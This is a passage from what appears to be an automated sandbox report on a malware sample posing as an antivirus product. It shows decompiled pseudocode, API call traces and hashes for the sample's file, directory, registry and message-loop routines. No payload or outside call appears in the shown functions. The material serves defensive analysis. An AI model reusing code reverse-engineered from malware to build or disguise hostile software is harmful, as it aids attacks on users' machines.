                                                                                                                                                              0x004094cc

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                                • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                                • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLastModuleNamePointer
                                                                                                                                                              • String ID: *messages***$@$a
                                                                                                                                                              • API String ID: 1624790276-2848287086
                                                                                                                                                              • Opcode ID: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                              • Instruction ID: 84dcd20e4f7640fa0209f036967ba761b6bafe31550b0c330afd5de3d59fc2c4
                                                                                                                                                              • Opcode Fuzzy Hash: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                              • Instruction Fuzzy Hash: 7C61F371904244EEEB31DB24CC84BAF3BA49B45314F1085BFE956B62D3CA788E46CB19
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00405097(void* __ecx, CHAR* _a4, WCHAR* _a8, char _a12, char _a15, long _a16) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _t41;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				WCHAR* _t51;
                                                                                                                                                              				long _t58;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              
                                                                                                                                                              				_t55 = __ecx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t62 = __ecx;
                                                                                                                                                              				 *((intOrPtr*)(__ecx + 0xc18)) = 0;
                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                              					_a12 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = 0x80000000;
                                                                                                                                                              				if(_a16 != 0) {
                                                                                                                                                              					_v8 = 0xc0000000;
                                                                                                                                                              				}
                                                                                                                                                              				_a16 = 1;
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					_a16 = 3;
                                                                                                                                                              				}
                                                                                                                                                              				_t58 = (0 |  *((intOrPtr*)(_t62 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					L10:
                                                                                                                                                              					_t41 = CreateFileA(_a4, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t51 = _a8;
                                                                                                                                                              					if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                              						goto L10;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t41 = CreateFileW(_t51, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t59 = _t41;
                                                                                                                                                              				if(_t59 == 0xffffffff && GetLastError() == 2) {
                                                                                                                                                              					 *((intOrPtr*)(_t62 + 0xc18)) = 1;
                                                                                                                                                              				}
                                                                                                                                                              				_a15 = _t59 != 0xffffffff;
                                                                                                                                                              				 *((char*)(_t62 + 0x12)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(_t62 + 0xc)) = 0;
                                                                                                                                                              				 *((char*)(_t62 + 0x10)) = 0;
                                                                                                                                                              				if(_a15 != 0) {
                                                                                                                                                              					 *(_t62 + 4) = _t59;
                                                                                                                                                              					if(_a8 == 0) {
                                                                                                                                                              						 *((short*)(_t62 + 0x418)) = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						E0040E338(_t62 + 0x418, _a8);
                                                                                                                                                              					}
                                                                                                                                                              					_t44 = _t62 + 0x17;
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						E0040E115(_t55, _a8, _t44, 0x1000000);
                                                                                                                                                              					} else {
                                                                                                                                                              						E0040A477(_t44, _a4);
                                                                                                                                                              					}
                                                                                                                                                              					E00404F07(_t62,  *(_t62 + 4));
                                                                                                                                                              				}
                                                                                                                                                              				return _a15;
                                                                                                                                                              			}










                                                                                                                                                              0x00405097
                                                                                                                                                              0x0040509a
                                                                                                                                                              0x0040509d
                                                                                                                                                              0x004050a2
                                                                                                                                                              0x004050ab
                                                                                                                                                              0x004050ad
                                                                                                                                                              0x004050ad
                                                                                                                                                              0x004050b1
                                                                                                                                                              0x004050bb
                                                                                                                                                              0x004050bd
                                                                                                                                                              0x004050bd
                                                                                                                                                              0x004050c4
                                                                                                                                                              0x004050ce
                                                                                                                                                              0x004050d0
                                                                                                                                                              0x004050d0
                                                                                                                                                              0x004050e5
                                                                                                                                                              0x004050ee
                                                                                                                                                              0x00405110
                                                                                                                                                              0x0040511e
                                                                                                                                                              0x004050f0
                                                                                                                                                              0x004050f0
                                                                                                                                                              0x004050f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004050fc
                                                                                                                                                              0x00405108
                                                                                                                                                              0x00405108
                                                                                                                                                              0x004050f5
                                                                                                                                                              0x00405124
                                                                                                                                                              0x00405129
                                                                                                                                                              0x00405136
                                                                                                                                                              0x00405136
                                                                                                                                                              0x00405143
                                                                                                                                                              0x00405147
                                                                                                                                                              0x0040514a
                                                                                                                                                              0x0040514d
                                                                                                                                                              0x00405153
                                                                                                                                                              0x00405155
                                                                                                                                                              0x0040515b
                                                                                                                                                              0x00405170
                                                                                                                                                              0x0040515d
                                                                                                                                                              0x00405167
                                                                                                                                                              0x00405167
                                                                                                                                                              0x00405177
                                                                                                                                                              0x0040517d
                                                                                                                                                              0x00405193
                                                                                                                                                              0x0040517f
                                                                                                                                                              0x00405183
                                                                                                                                                              0x00405183
                                                                                                                                                              0x0040519d
                                                                                                                                                              0x0040519d
                                                                                                                                                              0x004051a9

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 00405108
                                                                                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 0040511E
                                                                                                                                                                • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00409309,?,00000000,00000001,00000000,00000000,?,?,?,0000005C,00414C88), ref: 0040512B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 158210224-2381362037
                                                                                                                                                              • Opcode ID: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                              • Instruction ID: 427e4f42cfb4fe8a4b8f94c3947b3ca18014e29d0b63896657673fbab71910d3
                                                                                                                                                              • Opcode Fuzzy Hash: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                              • Instruction Fuzzy Hash: 2031F071800788AFDB218F60C844BDF3BA9EB41314F14456EF951AB281C3799E949BA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E004052D2(void* __ecx, void* _a4, long _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				int _t14;
                                                                                                                                                              				signed int _t15;
                                                                                                                                                              				long _t16;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                                                                                              					if(_a8 > 0x4e20) {
                                                                                                                                                              						_a8 = 0x4e20;
                                                                                                                                                              					}
                                                                                                                                                              					 *(_t22 + 4) = GetStdHandle(0xfffffff6);
                                                                                                                                                              				}
                                                                                                                                                              				_t14 = ReadFile( *(_t22 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                                                                                              				if(_t14 != 0) {
                                                                                                                                                              					_t15 = _v8;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t16 = E00405051(_t22);
                                                                                                                                                              					if(_t16 == 0 || _a8 <= 0x4e20) {
                                                                                                                                                              						if( *((intOrPtr*)(_t22 + 0xc)) != 1) {
                                                                                                                                                              							L11:
                                                                                                                                                              							_t15 = _t16 | 0xffffffff;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t16 = GetLastError();
                                                                                                                                                              							if(_t16 != 0x6d) {
                                                                                                                                                              								goto L11;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t15 = 0;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t15 = E004052D2(_t22, _a4, 0x4e20);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}








                                                                                                                                                              0x004052d5
                                                                                                                                                              0x004052d8
                                                                                                                                                              0x004052e3
                                                                                                                                                              0x004052e8
                                                                                                                                                              0x004052ea
                                                                                                                                                              0x004052ea
                                                                                                                                                              0x004052f5
                                                                                                                                                              0x004052f5
                                                                                                                                                              0x00405307
                                                                                                                                                              0x0040530f
                                                                                                                                                              0x00405348
                                                                                                                                                              0x00405311
                                                                                                                                                              0x00405313
                                                                                                                                                              0x0040531a
                                                                                                                                                              0x00405332
                                                                                                                                                              0x00405343
                                                                                                                                                              0x00405343
                                                                                                                                                              0x00405334
                                                                                                                                                              0x00405334
                                                                                                                                                              0x0040533d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040533f
                                                                                                                                                              0x0040533f
                                                                                                                                                              0x0040533f
                                                                                                                                                              0x0040533d
                                                                                                                                                              0x00405321
                                                                                                                                                              0x00405327
                                                                                                                                                              0x00405327
                                                                                                                                                              0x0040531a
                                                                                                                                                              0x0040534e

                                                                                                                                                              APIs
                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 004052EF
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405307
                                                                                                                                                              • GetLastError.KERNEL32(?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405334
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileHandleLastRead
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 1699850967-2381362037
                                                                                                                                                              • Opcode ID: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                              • Instruction ID: d972bf192e1d3f9598e18863326a66fe736dca606b714a29153f01d36eea9568
                                                                                                                                                              • Opcode Fuzzy Hash: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                              • Instruction Fuzzy Hash: E6015B31500904FBCF209B51C9048AFBB69EB413B4B10823BED29A62D0C7B8D950DF99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00404FDC(void* __ecx, signed int __edx) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				long _t8;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				signed int _t17;
                                                                                                                                                              				long _t20;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              
                                                                                                                                                              				_t17 = __edx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t23 = __ecx;
                                                                                                                                                              				_t8 = SetFilePointer( *(__ecx + 4), 0,  &_v8, 1); // executed
                                                                                                                                                              				_t20 = _t8;
                                                                                                                                                              				if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					_t11 = E00401030(_v8, _t17, 0, 1) + _t20;
                                                                                                                                                              					asm("adc edx, ecx");
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *((char*)(_t23 + 0x14)) == 0) {
                                                                                                                                                              						_t11 = _t17 | 0xffffffff;
                                                                                                                                                              					} else {
                                                                                                                                                              						E0040336D(0x414c7c, _t23 + 0x17);
                                                                                                                                                              						goto L4;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              			}









                                                                                                                                                              0x00404fdc
                                                                                                                                                              0x00404fdf
                                                                                                                                                              0x00404fe0
                                                                                                                                                              0x00404fec
                                                                                                                                                              0x00404ff3
                                                                                                                                                              0x00404ff9
                                                                                                                                                              0x00404ffe
                                                                                                                                                              0x0040501e
                                                                                                                                                              0x00405023
                                                                                                                                                              0x0040502f
                                                                                                                                                              0x00405031
                                                                                                                                                              0x0040500a
                                                                                                                                                              0x0040500e
                                                                                                                                                              0x0040503a
                                                                                                                                                              0x00405010
                                                                                                                                                              0x00405019
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405019
                                                                                                                                                              0x0040500e
                                                                                                                                                              0x00405036

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                              • GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: @Met$|LA
                                                                                                                                                              • API String ID: 2976181284-312740233
                                                                                                                                                              • Opcode ID: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                              • Instruction ID: 2e480e1ce5fe1b1d35513c41c649f52fd4b6def30c48a15a8177b9897f1f0cd1
                                                                                                                                                              • Opcode Fuzzy Hash: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                              • Instruction Fuzzy Hash: 4BF0F6727406007BE724A669CD0ABDF36ADDBC1764F14423AB511E22D0DAF89D0096AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405898(void* __eflags, CHAR* _a4, WCHAR* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				int _t7;
                                                                                                                                                              				long _t8;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				WCHAR* _t14;
                                                                                                                                                              
                                                                                                                                                              				_t6 = E00406EA5();
                                                                                                                                                              				_t14 = _a8;
                                                                                                                                                              				if(_t6 == 0 || _t14 == 0 ||  *_t14 == 0) {
                                                                                                                                                              					_t7 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t7 = CreateDirectoryW(_t14, 0);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                              					_t8 = GetLastError();
                                                                                                                                                              					__eflags = _t8 - 2;
                                                                                                                                                              					if(_t8 == 2) {
                                                                                                                                                              						L12:
                                                                                                                                                              						_t9 = 2;
                                                                                                                                                              						return _t9;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t8 - 3;
                                                                                                                                                              					if(_t8 == 3) {
                                                                                                                                                              						goto L12;
                                                                                                                                                              					}
                                                                                                                                                              					return 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t20 = _a12;
                                                                                                                                                              					if(_a12 != 0) {
                                                                                                                                                              						E004057E8(_t20, _a4, _t14, _a16);
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              			}








                                                                                                                                                              0x0040589c
                                                                                                                                                              0x004058a1
                                                                                                                                                              0x004058a6
                                                                                                                                                              0x004058c2
                                                                                                                                                              0x004058b2
                                                                                                                                                              0x004058b5
                                                                                                                                                              0x004058b5
                                                                                                                                                              0x004058ca
                                                                                                                                                              0x004058e2
                                                                                                                                                              0x004058e8
                                                                                                                                                              0x004058eb
                                                                                                                                                              0x004058f7
                                                                                                                                                              0x004058f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058f9
                                                                                                                                                              0x004058ed
                                                                                                                                                              0x004058f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058cc
                                                                                                                                                              0x004058cc
                                                                                                                                                              0x004058d0
                                                                                                                                                              0x004058d9
                                                                                                                                                              0x004058d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058de

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000400,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058B5
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058C2
                                                                                                                                                              • GetLastError.KERNEL32(?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058E2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 4238167203-2381362037
                                                                                                                                                              • Opcode ID: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                              • Instruction ID: 59de209e465ca692b93f1b9bd8997e8896771fb0caf9f8e2694668fec01ab97a
                                                                                                                                                              • Opcode Fuzzy Hash: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                              • Instruction Fuzzy Hash: 5EF0AF32101A0476EB257A209C09BAB3A68EF05750F14C433FD02F51E0D7788871EE9E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040B9B0(void* __esi, intOrPtr _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				char _v1040;
                                                                                                                                                              				char _v2064;
                                                                                                                                                              				long _t13;
                                                                                                                                                              
                                                                                                                                                              				if( *0x419f90 != 0) {
                                                                                                                                                              					E0040B901( &_v1040, _a4);
                                                                                                                                                              					_t13 = RegOpenKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 1,  &_v8); // executed
                                                                                                                                                              					if(_t13 == 0) {
                                                                                                                                                              						_v12 = 0x400;
                                                                                                                                                              						if(RegQueryValueExA(_v8,  &_v1040, 0,  &_v16,  &_v2064,  &_v12) == 0) {
                                                                                                                                                              							E0040A477(_a4,  &_v2064);
                                                                                                                                                              						}
                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}









                                                                                                                                                              0x0040b9c0
                                                                                                                                                              0x0040b9cc
                                                                                                                                                              0x0040b9e3
                                                                                                                                                              0x0040b9ec
                                                                                                                                                              0x0040ba09
                                                                                                                                                              0x0040ba18
                                                                                                                                                              0x0040ba24
                                                                                                                                                              0x0040ba24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ba2c
                                                                                                                                                              0x0040b9ec
                                                                                                                                                              0x0040ba33

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000001,0000000C,?,00000022), ref: 0040B9E3
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(0000000C,?,00000000,00000000,?,?), ref: 0040BA10
                                                                                                                                                              • RegCloseKey.ADVAPI32(0000000C), ref: 0040BA2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID: Software\WinRAR SFX
                                                                                                                                                              • API String ID: 3677997916-754673328
                                                                                                                                                              • Opcode ID: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                              • Instruction ID: 6051d0f75422db7d6b46e309ec543619c6146246f4a2ef773cf3b5fda2ce6207
                                                                                                                                                              • Opcode Fuzzy Hash: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                              • Instruction Fuzzy Hash: 8A011A75500208BEEB11DB90DD45FDE7BBCEB04748F0081A2BB04F1090E7B49A59DB98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040A82D() {
                                                                                                                                                              				struct tagMSG _v32;
                                                                                                                                                              				int _t6;
                                                                                                                                                              				long _t12;
                                                                                                                                                              
                                                                                                                                                              				_t6 = PeekMessageA( &_v32, 0, 0, 0, 0); // executed
                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                              					GetMessageA( &_v32, 0, 0, 0); // executed
                                                                                                                                                              					TranslateMessage( &_v32);
                                                                                                                                                              					_t12 = DispatchMessageA( &_v32); // executed
                                                                                                                                                              					return _t12;
                                                                                                                                                              				}
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}






                                                                                                                                                              0x0040a83e
                                                                                                                                                              0x0040a846
                                                                                                                                                              0x0040a84f
                                                                                                                                                              0x0040a859
                                                                                                                                                              0x0040a863
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040a863
                                                                                                                                                              0x0040a86b

                                                                                                                                                              APIs
                                                                                                                                                              • PeekMessageA.USER32(0040A7FA,00000000,00000000,00000000,00000000), ref: 0040A83E
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL ref: 0040A84F
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0040A859
                                                                                                                                                              • DispatchMessageA.USER32 ref: 0040A863
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1533324876-0
                                                                                                                                                              • Opcode ID: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
